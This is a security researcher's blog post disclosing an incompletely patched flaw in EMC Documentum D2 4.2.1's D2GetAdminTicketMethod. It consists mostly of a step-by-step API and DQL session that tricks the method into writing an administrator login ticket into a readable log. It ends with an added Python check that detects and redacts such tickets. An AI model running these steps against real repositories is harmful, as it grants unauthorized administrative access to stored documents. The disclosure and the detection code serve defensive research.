Is it worth treating the flu if the patient has cancer?

Here I described a vulnerability in the D2GetAdminTicketMethod docbase method. After that, EMC released D2 4.2, where they started encrypting return values passed through the c6_method_return object, but their solution was still vulnerable. Now, in D2 4.2.1, they have decided to treat snots instead of raising the technology level of D2. Note that the security advisory is still not published:

which, according to the statements provided above, means that EMC does not “want to inform customers about a new or updated recommendation on security best practices”.

Fortunately, EMC coders neither know the product they are trying to develop, nor read documentation. Follow my hands:

API> create,c,c6_method_return
...
000224838000011f
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod,
     ARGUMENTS,S,'
       -docbase_name d2 
       -password "" 
       -method_return_id 000224838000011f 
       -scope global 
       -timeout 3600
     '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> revert,c,000224838000011f
...
OK
API> get,c,000224838000011f,message
...
AAAAEFRN36mfm+NAm49DQAZol1fSBbIgoELusFMnk4eE6r3qNPm/83NDxqiFyoe7Yt/GOjASn6v2
v2XjSaJq5MqGK8PgrNPbNz5KSAzxcKTWorJym/7ceZsp9l5pSUcDr1mj8xKg0M/iH8AIS8ZGZ9/L
2bd1FOth86ISN2OnAIOAlzh32I0/YcLYt7nSSfFWDL9H9qzzkp6Za/NeZt4Z0kE1gYNPaVrlPD4D
qC4bcSb3p54VeAZCVOgpUp3sJ+8kevoRQSKckOTSinBYF4qQa9pnNYQx8wczFk2/pM0pkCdDigyT
uOluf/e5kmAui7LLr7LkeBYiKBXaJg72sDT2pKjWi6byYIQ/fim57QrxXR608Pw0meiADtHQXARF
c9PtRvavRM7+m1HrfcRAML7qFUJCrIjDhEf/MTA95ZPYM3tdp2aEcq0EspD4Cn//iwVW9DK5Vt5c
AmtGRUfA0rHB6UvGhWbH5hQb9itZCP3lMDEjBr2B/3jbBC+CuMvK049j1rBxV5h1XJGhjJ+oMJWg
kmvFAjoZJNuqUWCqWLHn+WyO5I5DA54qUtw/SERO1srCPP6jYuE2Ym6WaVRXDhzZCjQLz+fbciba
qSbTFdeXQFZAO2s24mKx3tetyAp9nS04pAfTyFlLsMN83LRIGCUwij3BrfTY4X9wq4WqQiAT3a8M
jHrCXpd/5tWLMVPm/0jSSgj/SMtzU4bVBHKoIFclzLq+ciIsy9hVKdV8dQBfWzt3brQqGv8H2TvR
VlTxwTJWLZ/chujhwmWBN/28tXzK6EhLs5mSVaJ/SI7A4VhEq3qtileKaSULKSZiZ4sIT2nFAG7r
vBDGiEGQ/iG7jITFWYq4boou305kfYuPqM1U0E1qo8UQ

API> ?,c,update c6_method_return object 
     set parameter_name[0]='-timeout', 
     set parameter_value[0]=(select message from c6_method_return 
        where r_object_id='000224838000011f') 
     where r_object_id='000224838000011f'
objects_updated
---------------
              1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info:  "1 objects were affected by your UPDATE statement."


API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod,
     ARGUMENTS,S,'
        -docbase_name d2 
        -password "" 
        -method_return_id 000224838000011f 
        -scope global -timeout 3600
     ',
     SAVE_RESULTS,B,T
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0902248380002a67
  result_doc_id                   : 0902248380002a67
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> get,c,000224838000011f,message
...
API> get,c,000224838000011f,error
...

API> getpath,c,0902248380002a67
...
/u01/documentum/cs/data/d2/content_storage_01/00022483/80/00/09/e1.txt
API> quit
Bye
 ~]$ cat content_storage_01/00022483/80/00/09/e1.txt
==== START =======================================================
D2-API v4.2.0010 build 378
DFC version : 7.1.0020.0120
file.encoding : UTF-8
Arguments : {-docbase_name=d2, 
    -method_return_id=000224838000011f, 
    -password=, 
    -class_name=com.emc.d2.api.methods.D2GetAdminTicketMethod, 
    -scope=global,
    -timeout=DM_TICKET=T0JKIE5VTEwgMAoxMwp....
}
-Scope : global
-TimeOut : 3600
D2Method.passphrase MD5 : default
-SingleUse : true
D2Method.passphrase MD5 : default
==== END (0.095s) ================================================

This is already the second attempt to fix the D2GetAdminTicketMethod vulnerability, and the fix is still incomplete and wrong. What a shame: EMC has been unable to fix a high-severity vulnerability for 5 months already.
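A defender-side check for the leak visible in the method log above, as an added example that is not part of the original post or of D2: it parses the `Arguments` block of a method result log, flags any argument that carries a `DM_TICKET=` value or a non-numeric `-timeout`, and masks the ticket before the log is kept. The sample log is constructed from the format shown above with a placeholder ticket; the function names and the `NUMERIC_ARGS` set are assumptions.

```python
import re

# Constructed sample modelled on the method log format shown above; the ticket
# value is a placeholder, not a real ticket.
SAMPLE_LOG = """\
==== START =======================================================
D2-API v4.2.0010 build 378
Arguments : {-docbase_name=d2,
    -method_return_id=000224838000011f,
    -password=,
    -class_name=com.emc.d2.api.methods.D2GetAdminTicketMethod,
    -scope=global,
    -timeout=DM_TICKET=PLACEHOLDERPLACEHOLDER....
}
-TimeOut : 3600
==== END (0.095s) ================================================
"""

ARGS_BLOCK = re.compile(r"^Arguments : \{(.*?)\}", re.S | re.M)
NUMERIC_ARGS = {"-timeout"}  # assumption: arguments that must be integers


def parse_arguments(log_text):
    """Return the logged method arguments as a dict (name -> raw value)."""
    m = ARGS_BLOCK.search(log_text)
    if not m:
        return {}
    args = {}
    for item in re.split(r",\s*(?=-\w)", m.group(1).strip()):
        name, _, value = item.strip().partition("=")
        args[name] = value.rstrip(",").strip()
    return args


def audit_method_log(log_text):
    """Flag arguments that expose a login ticket or break their expected type."""
    findings = []
    for name, value in parse_arguments(log_text).items():
        if "DM_TICKET=" in value:
            findings.append((name, "login ticket in plaintext"))
        if name in NUMERIC_ARGS and not value.isdigit():
            findings.append((name, "non-numeric value"))
    return findings


def redact(log_text):
    """Mask ticket material before the log is stored or shared."""
    return re.sub(r"DM_TICKET=\S+", "DM_TICKET=<redacted>", log_text)
```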
